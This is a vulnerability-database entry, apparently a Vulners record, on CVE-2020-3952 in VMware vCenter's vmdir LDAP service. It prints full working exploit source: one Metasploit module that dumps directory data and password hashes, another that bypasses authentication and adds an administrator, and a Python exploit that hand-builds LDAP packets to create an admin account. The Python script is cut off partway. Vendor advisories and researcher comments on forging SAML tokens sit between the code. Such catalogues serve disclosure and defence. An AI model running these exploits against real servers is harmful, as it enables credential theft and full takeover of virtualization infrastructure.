DATABASE RESOURCES PRICING ABOUT US

{"id": "MSF:AUXILIARY-GATHER-VMWARE_VCENTER_VMDIR_LDAP-", "vendorId": null, "type": "metasploit", "bulletinFamily": "exploit", "title": "VMware vCenter Server vmdir Information Disclosure", "description": "This module uses an anonymous-bind LDAP connection to dump data from the vmdir service in VMware vCenter Server version 6.7 prior to the 6.7U3f update, only if upgraded from a previous release line, such as 6.0 or 6.5. If the bind username and password are provided (BIND_DN and BIND_PW options), these credentials will be used instead of attempting an anonymous bind.\n", "published": "2020-04-22T22:38:12", "modified": "2022-01-12T15:51:40", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.rapid7.com/db/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap/", "reporter": "Hynek Petrak, wvu <wvu@metasploit.com>", "references": [], "cvelist": ["CVE-2020-3952"], "immutableFields": [], "lastseen": "2022-06-24T08:40:37", "viewCount": 8, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:605E9AABF85A309DCC2B08791CD8A47B", "0DAYDB:86305C86483A99E3E27347A2CBC3B02C", "0DAYDB:A820E9CE5C7A2E010E37B1EC1DAFD043"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:84DFD86F1486CB7C353A93F819261FA2"]}, {"type": "attackerkb", "idList": ["AKB:85036BC9-E798-46CE-A5B3-43BDCFE83346"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1024"]}, {"type": "cve", "idList": ["CVE-2020-3952"]}, {"type": "exploitdb", "idList": ["EDB-ID:48535"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-LDAP-VMWARE_VCENTER_VMDIR_AUTH_BYPASS-"]}, {"type": "nessus", "idList": ["VMWARE_VCENTER_VMSA-2020-0006.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157896"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953"]}, {"type": "threatpost", "idList": ["THREATPOST:D3B948D7FFB688A6022FF02F81F830F7"]}, {"type": "vmware", "idList": ["VMSA-2020-0006", "VMSA-2020-0006.1"]}, {"type": "zdt", "idList": ["1337DAY-ID-34499"]}]}, "vulnersScore": 0.2}, "_state": {"score": 1660009287, "dependencies": 1660004461}, "_internal": {"score_hash": "140197fd7935b7576e13be50503bb8f1"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/hashes/identify'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::LDAP\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server vmdir Information Disclosure',\n 'Description' => %q{\n This module uses an anonymous-bind LDAP connection to dump data from\n the vmdir service in VMware vCenter Server version 6.7 prior to the\n 6.7U3f update, only if upgraded from a previous release line, such as\n 6.0 or 6.5.\n If the bind username and password are provided (BIND_DN and BIND_PW\n options), these credentials will be used instead of attempting an\n anonymous bind.\n },\n 'Author' => [\n 'Hynek Petrak', # Discovery, hash dumping\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-3952'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0006.html']\n ],\n 'DisclosureDate' => '2020-04-09', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Dump', { 'Description' => 'Dump all LDAP data' }]\n ],\n 'DefaultAction' => 'Dump',\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS],\n 'Reliability' => []\n }\n )\n )\n\n register_options([\n Opt::RPORT(636), # SSL/TLS\n OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it'])\n ])\n end\n\n def base_dn\n @base_dn ||= 'dc=vsphere,dc=local'\n end\n\n def policy_dn\n \"cn=password and lockout policy,#{base_dn}\"\n end\n\n # PoC using ldapsearch(1):\n #\n # Retrieve root DSE with base DN:\n # ldapsearch -xb \"\" -s base -H ldap://[redacted]\n #\n # Dump data using discovered base DN:\n # ldapsearch -xb dc=vsphere,dc=local -H ldap://[redacted] \\* + -\n def run\n entries = nil\n\n ldap_connect do |ldap|\n if (@base_dn = datastore['BASE_DN'])\n print_status(\"User-specified base DN: #{base_dn}\")\n else\n print_status('Discovering base DN automatically')\n\n unless (@base_dn = discover_base_dn(ldap))\n print_warning('Falling back on default base DN dc=vsphere,dc=local')\n end\n end\n\n print_status(\"Dumping LDAP data from vmdir service at #{peer}\")\n\n # A \"-\" meta-attribute will dump userPassword (hat tip Hynek)\n # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/ldap-head/result.c#L647-L654\n entries = ldap.search(base: base_dn, attributes: %w[* + -])\n end\n\n # Look for an entry with a non-empty vmwSTSPrivateKey attribute\n unless entries&.find { |entry| entry[:vmwstsprivatekey].any? }\n print_error(\"#{peer} is NOT vulnerable to CVE-2020-3952\") unless datastore['BIND_PW'].present?\n print_error('Dump failed')\n return Exploit::CheckCode::Safe\n end\n\n print_good(\"#{peer} is vulnerable to CVE-2020-3952\") unless datastore['BIND_PW'].present?\n pillage(entries)\n\n # HACK: Stash discovered base DN in CheckCode reason\n Exploit::CheckCode::Vulnerable(base_dn)\n rescue Net::LDAP::Error => e\n print_error(\"#{e.class}: #{e.message}\")\n Exploit::CheckCode::Unknown\n end\n\n def pillage(entries)\n # TODO: Make this more efficient?\n ldif = entries.map(&:to_ldif).map { |s| s.force_encoding('utf-8') }.join(\"\\n\")\n\n print_status('Storing LDAP data in loot')\n\n ldif_filename = store_loot(\n name, # ltype\n 'text/plain', # ctype\n rhost, # host\n ldif, # data\n nil, # filename\n \"Base DN: #{base_dn}\" # info\n )\n\n unless ldif_filename\n print_error('Could not store LDAP data in loot')\n return\n end\n\n print_good(\"Saved LDAP data to #{ldif_filename}\")\n\n if (policy = entries.find { |entry| entry.dn == policy_dn })\n print_status('Password and lockout policy:')\n print_line(policy.to_ldif[/^vmwpassword.*/m])\n end\n\n # Process entries with a non-empty userPassword attribute\n process_hashes(entries.select { |entry| entry[:userpassword].any? })\n end\n\n def process_hashes(entries)\n if entries.empty?\n print_status('No password hashes found')\n return\n end\n\n service_details = {\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: rport,\n protocol: 'tcp',\n service_name: 'vmdir/ldap'\n }\n\n entries.each do |entry|\n # This is the \"username\"\n dn = entry.dn\n\n # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/middle-layer/password.c#L32-L76\n type, hash, salt = entry[:userpassword].first.unpack('CH128H32')\n\n case type\n when 1\n unless hash.length == 128\n vprint_error(\"Type #{type} hash length is not 128 digits (#{dn})\")\n next\n end\n\n unless salt.length == 32\n vprint_error(\"Type #{type} salt length is not 32 digits (#{dn})\")\n next\n end\n\n # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197\n john_hash = \"$dynamic_82$#{hash}$HEX$#{salt}\"\n else\n vprint_error(\"Hash type #{type.inspect} is not supported yet (#{dn})\")\n next\n end\n\n print_good(\"Credentials found: #{dn}:#{john_hash}\")\n\n create_credential(service_details.merge(\n username: dn,\n private_data: john_hash,\n private_type: :nonreplayable_hash,\n jtr_format: identify_hash(john_hash)\n ))\n end\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"metasploit": [{"lastseen": "2022-06-24T08:40:34", "description": "This module bypasses LDAP authentication in VMware vCenter Server's vmdir service to add an arbitrary administrator user. Version 6.7 prior to the 6.7U3f update is vulnerable, only if upgraded from a previous release line, such as 6.0 or 6.5. Note that it is also possible to provide a bind username and password to authenticate if the target is not vulnerable. It will add an arbitrary administrator user the same way.\n", "cvss3": {}, "published": "2020-04-22T22:38:11", "type": "metasploit", "title": "VMware vCenter Server vmdir Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2022-01-12T15:51:40", "id": "MSF:AUXILIARY-ADMIN-LDAP-VMWARE_VCENTER_VMDIR_AUTH_BYPASS-", "href": "https://www.rapid7.com/db/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::LDAP\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server vmdir Authentication Bypass',\n 'Description' => %q{\n This module bypasses LDAP authentication in VMware vCenter Server's\n vmdir service to add an arbitrary administrator user. Version 6.7\n prior to the 6.7U3f update is vulnerable, only if upgraded from a\n previous release line, such as 6.0 or 6.5.\n Note that it is also possible to provide a bind username and password\n to authenticate if the target is not vulnerable. It will add an\n arbitrary administrator user the same way.\n },\n 'Author' => [\n 'Hynek Petrak', # Discovery\n 'JJ Lehmann', # Analysis and PoC\n 'Ofri Ziv', # Analysis and PoC\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-3952'],\n ['URL', 'https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0006.html'],\n ['URL', 'https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md']\n ],\n 'DisclosureDate' => '2020-04-09', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Add', { 'Description' => 'Add an admin user' }]\n ],\n 'DefaultAction' => 'Add',\n 'DefaultOptions' => {\n 'SSL' => true,\n 'CheckModule' => 'auxiliary/gather/vmware_vcenter_vmdir_ldap'\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS],\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],\n 'Reliability' => []\n }\n )\n )\n\n register_options([\n Opt::RPORT(636), # SSL/TLS\n OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it']),\n OptString.new('USERNAME', [false, 'Username of admin user to add']),\n OptString.new('PASSWORD', [false, 'Password of admin user to add'])\n ])\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def base_dn\n @base_dn ||= 'dc=vsphere,dc=local'\n end\n\n def user_dn\n \"cn=#{username},cn=Users,#{base_dn}\"\n end\n\n def group_dn\n \"cn=Administrators,cn=Builtin,#{base_dn}\"\n end\n\n def run\n unless username && password\n print_error('Please set the USERNAME and PASSWORD options to proceed')\n return\n end\n\n # NOTE: check is provided by auxiliary/gather/vmware_vcenter_vmdir_ldap\n checkcode = check\n\n return unless checkcode == Exploit::CheckCode::Vulnerable\n\n if (@base_dn = datastore['BASE_DN'])\n print_status(\"User-specified base DN: #{base_dn}\")\n else\n # HACK: We stashed the detected base DN in the CheckCode's reason\n @base_dn = checkcode.reason\n end\n\n ldap_connect do |ldap|\n print_status(\"Bypassing LDAP auth in vmdir service at #{peer}\")\n auth_bypass(ldap)\n\n print_status(\"Adding admin user #{username} with password #{password}\")\n\n unless add_admin(ldap)\n print_error(\"Failed to add admin user #{username}\")\n end\n end\n rescue Net::LDAP::Error => e\n print_error(\"#{e.class}: #{e.message}\")\n end\n\n # This will always return false, since the creds are invalid\n def auth_bypass(ldap)\n # when datastore['BIND_DN'] has been provided in options,\n # ldap_connect has already made a bind for us.\n return if datastore['BIND_DN']\n\n ldap.bind(\n method: :simple,\n username: Rex::Text.rand_text_alphanumeric(8..42),\n password: Rex::Text.rand_text_alphanumeric(8..42)\n )\n end\n\n def add_admin(ldap)\n user_info = {\n 'objectClass' => %w[top person organizationalPerson user],\n 'cn' => username,\n 'sn' => 'vsphere.local',\n 'givenName' => username,\n 'sAMAccountName' => username,\n 'userPrincipalName' => \"#{username}@VSPHERE.LOCAL\",\n 'uid' => username,\n 'userPassword' => password\n }\n\n # Add our new user\n unless ldap.add(dn: user_dn, attributes: user_info)\n res = ldap.get_operation_result\n\n case res.code\n when Net::LDAP::ResultCodeInsufficientAccessRights\n print_error('Failed to bypass LDAP auth in vmdir service')\n when Net::LDAP::ResultCodeEntryAlreadyExists\n print_error(\"User #{username} already exists\")\n when Net::LDAP::ResultCodeConstraintViolation\n print_error(\"Password #{password} does not meet policy requirements\")\n else\n print_error(\"#{res.message}: #{res.error_message}\")\n end\n\n return false\n end\n\n print_good(\"Added user #{username}, so auth bypass was successful!\")\n\n # Add our user to the admin group\n unless ldap.add_attribute(group_dn, 'member', user_dn)\n res = ldap.get_operation_result\n\n if res.code == Net::LDAP::ResultCodeAttributeOrValueExists\n print_error(\"User #{username} is already an admin\")\n else\n print_error(\"#{res.message}: #{res.error_message}\")\n end\n\n return false\n end\n\n print_good(\"Added user #{username} to admin group\")\n\n true\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2022-07-15T19:58:18", "description": "", "cvss3": {}, "published": "2020-04-15T18:47:00", "type": "akamaiblog", "title": "What?s a 10? Pwning vCenter with CVE-2020-3952", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-15T18:47:00", "id": "AKAMAIBLOG:84DFD86F1486CB7C353A93F819261FA2", "href": "https://www.akamai.com/blog/security/pwning-vmware-vcenter-cve-2020-3952", "cvss": {"score": 0.0, "vector": "NONE"}}], "vmware": [{"lastseen": "2020-04-11T22:42:33", "description": "##### 1\\. Impacted Products\n\n * VMware vCenter Server\n\n##### 2\\. Introduction\n\n###### A sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) was privately reported to VMware. vCenter updates are available to address this vulnerability. \n\n\n###### \n\n##### 3\\. VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952) \n\n\n**Description: \n**\n\nUnder certain conditions1 vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls. VMware has evaluated the severity of this issue to be in the [Critical severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [10.0](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors:**\n\nA malicious actor with network access to an affected vmdir deployment may be able to extract highly sensitive information which could be used to compromise vCenter Server or other services which are dependent upon vmdir for authentication. \n\n\n**Resolution:**\n\nTo remediate CVE-2020-3952 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds:**\n\nNone.\n\n**Additional Documentation:**\n\nVMware has created [KB78543](<https://kb.vmware.com/s/article/78543>) which details steps to determine whether or not a particular deployment is affected by CVE-2020-3952. \n\n\n**Acknowledgements:**\n\nNone.\n\n**Notes:**\n\n1vCenter Server 6.7 (embedded or external PSC) prior to 6.7u3f is affected by CVE-2020-3952 if it was upgraded from a previous release line such as 6.0 or 6.5. Clean installations of vCenter Server 6.7 (embedded or external PSC) are not affected.\n\n**Response Matrix:**\n", "cvss3": {}, "published": "2020-04-09T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-09T00:00:00", "id": "VMSA-2020-0006", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0006.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-26T00:56:18", "description": "3\\. VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952) \n\nUnder certain conditions[1] vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 10.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-09T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address sensitive information disclosure vulnerability in the VMware Directory Service (vmdir) (CVE-2020-3952)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-04-16T00:00:00", "id": "VMSA-2020-0006.1", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0006.1.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:19", "description": "An authentication bypass vulnerability exists in VMware VCenter Server Directory Service. Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-26T00:00:00", "type": "checkpoint_advisories", "title": "VMware VCenter Server Directory Service Authentication Bypass (CVE-2020-3952)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-10-26T00:00:00", "id": "CPAI-2020-1024", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-06-14T23:28:08", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 16, 2020 1:25pm UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\n**busterb** at April 15, 2020 4:15pm UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\n**cnotin** at April 16, 2020 2:20pm UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\n**hrbrmstr** at April 18, 2020 11:49am UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-3952 - VMware vCenter Server vmdir Information Disclosure", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-08-28T00:00:00", "id": "AKB:85036BC9-E798-46CE-A5B3-43BDCFE83346", "href": "https://attackerkb.com/topics/f5Gs82lZKq/cve-2020-3952---vmware-vcenter-server-vmdir-information-disclosure", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-07-19T21:59:12", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-06-01T00:00:00", "type": "zdt", "title": "VMware vCenter Server 6.7 - Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-06-01T00:00:00", "id": "1337DAY-ID-34499", "href": "https://0day.today/exploit/description/34499", "sourceData": "# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html\r\n# Version: vCenter Server 6.7 before update 3f\r\n# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0)\r\n# CVE: CVE-2020-3952\r\n\r\n#!/usr/bin/env python3\r\n\r\n'''\r\n\tCopyright 2020 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952\r\n \r\n File name CVE-2020-3592.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n \r\n ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n\r\n Features: exploit + vulnerability checker\r\n'''\r\n\r\nimport binascii, socket, sys, string, random\r\n\r\n## Default vars; change at will\r\n_sIP = '192.168.50.35'\r\n_iPORT = 389\r\n_iTIMEOUT = 5\r\n\r\ndef randomString(iStringLength=8):\r\n #sLetters = string.ascii_lowercase\r\n sLetters = string.ascii_letters\r\n return ''.join(random.choice(sLetters) for i in range(iStringLength))\r\n\r\ndef getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified\r\n ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed\r\n sReturn = sPrefix\r\n if (len(sData) / 2 ) > 255:\r\n sReturn += b'82'\r\n hexBytes = 2\r\n elif (len(sData) /2 ) >= 128:\r\n sReturn += b'81'\r\n sReturn += f\"{int(len(sData)/2):#0{(hexBytes*2)+2}x}\"[2:].encode()\r\n return sReturn\r\n\r\ndef buildBindRequestPacket(sUser, sPass):\r\n sUser = binascii.hexlify(sUser.encode())\r\n sPass = binascii.hexlify(sPass.encode())\r\n ## Packet Construction\r\n sPacket = getLengthPrefix(sPass, b'80') + sPass\r\n sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket\r\n sPacket = b'020103' + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'60') + sPacket\r\n sPacket = b'020101' + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket) \r\n\r\ndef buildUserCreatePacket(sUser, sPass):\r\n sUser = binascii.hexlify(sUser.encode())\r\n sPass = binascii.hexlify(sPass.encode())\r\n def createAttribute(sName, sValue):\r\n sValue = getLengthPrefix(sValue, b'04') + sValue\r\n sName = getLengthPrefix(sName, b'04') + sName\r\n \r\n sReturn = getLengthPrefix(sValue, b'31') + sValue\r\n sReturn = sName + sReturn\r\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\r\n return sReturn\r\n \r\n def createObjectClass():\r\n sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user')\r\n \r\n sReturn = getLengthPrefix(sReturn, b'31') + sReturn\r\n sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn\r\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\r\n return sReturn\r\n \r\n ## Attributes\r\n sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True'))\r\n sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL'))\r\n sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local'))\r\n sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser)\r\n sAttributes += createObjectClass()\r\n sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass)\r\n ## CN\r\n sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local')\r\n sUserEntry = getLengthPrefix(sCN, b'04') + sCN\r\n \r\n ## Packet Assembly (bottom up)\r\n sPacket = getLengthPrefix(sAttributes, 